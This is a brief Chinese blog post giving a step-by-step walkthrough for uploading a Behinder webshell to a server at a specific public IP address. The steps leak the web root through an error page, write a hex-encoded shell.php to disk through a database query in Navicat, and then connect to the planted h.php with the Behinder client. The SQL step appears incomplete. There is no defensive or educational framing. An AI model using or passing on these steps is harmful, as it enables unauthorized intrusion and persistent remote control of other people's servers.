hqhdry

在网站输入一个错误文件访问获得绝对路径http://183.63.176.19:8090/admin.php

用Navicat连接数据库

用em编辑器打开G:\Behinder\server\shell.php,并转化格式为合并行,复制内容到火狐浏览器进行编码为十六进制,然后复制内容

连接后在查询模块新建查询,输入语句 select 0x粘贴内容 \'绝对路径//文件名\'

点击运行

绝对路径中所有\需要改成//

在浏览器中访问上传的文件,http://183.63.176.19:8090/ThinkPHP3//Lib//Core//h.php

接着用冰蝎(behind)进行连接即可,连接失败的话讲设置代理禁用

 

分类:

技术点:

相关文章:

  • 2021-12-23
  • 2022-12-23
  • 2021-12-26
  • 2021-12-28
  • 2021-11-21
  • 2021-12-10
  • 2021-11-19
  • 2021-05-12
猜你喜欢
  • 2021-12-07
  • 2022-01-12
  • 2021-12-20
  • 2021-12-15
  • 2021-08-11
相关资源
相似解决方案